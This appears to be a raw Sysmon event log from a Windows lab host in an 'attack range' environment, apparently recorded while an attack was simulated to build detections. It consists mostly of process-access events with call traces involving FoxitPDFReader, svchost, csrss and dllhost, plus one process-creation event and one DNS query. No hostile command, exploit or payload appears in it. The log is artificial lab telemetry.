Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.889{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.889{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.889{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64) 10341000x800000000000000040437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.889{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64) 10341000x800000000000000040436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.735{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.735{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.686{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.623{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.545{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.545{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.545{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.545{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.545{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.545{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.556{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 22542200x800000000000000040425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.841{FE4C2B44-DA03-63C7-2900-00000000AF02}2712win-dc-ctus-attack-range-271.attackrange.local0fe80::8599:7e7b:594b:6e25;::ffff:10.0.1.14;C:\Windows\System32\dfssvc.exe 10341000x800000000000000040424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.252{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.247{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.247{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.246{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64) 10341000x800000000000000040420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.246{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64) 10341000x800000000000000040419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.240{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.240{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 